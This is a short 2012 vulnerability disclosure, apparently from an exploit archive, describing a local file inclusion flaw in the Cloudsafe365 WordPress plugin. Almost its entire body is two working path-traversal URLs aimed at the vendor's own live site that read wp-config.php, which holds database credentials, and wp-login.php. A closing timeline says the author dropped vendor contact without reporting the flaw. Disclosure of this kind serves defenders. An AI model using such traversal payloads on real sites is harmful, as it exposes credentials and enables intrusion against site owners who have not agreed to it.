WordPress Cloudsafe365 Local File Inclusion

Posted on 29 August 2012

This wordpress security plugin lets you read arbitrary files on the system. Looking at the code, there will be plenty of stuff like this. Demo: http://www.cloudsafe365.com/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=../../../../../wp-config.php http://www.cloudsafe365.com/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=../../../../../wp-login.php Disclosure timeline: * Today: visit wordpress.org * Try to report bug * System wants login * Visit web site: vendor has no e-mail address and stupid one-liner contact form and hidden name * Stuff it, I'm not going to phone them

TOP

Malware :

RATDispenser
whispergate
Borat RAT
Trojanized X_Trader
BlackLotus

Last 20

Exploits :

Docker Privileged Container Kernel Escape
Systemd Insecure PTY Handling
SOPlanning 1.52.00 Cross Site Scripting
SOPlanning 1.52.00 Cross Site Request Forgery
SOPlanning 1.52.00 SQL Injection

Last 20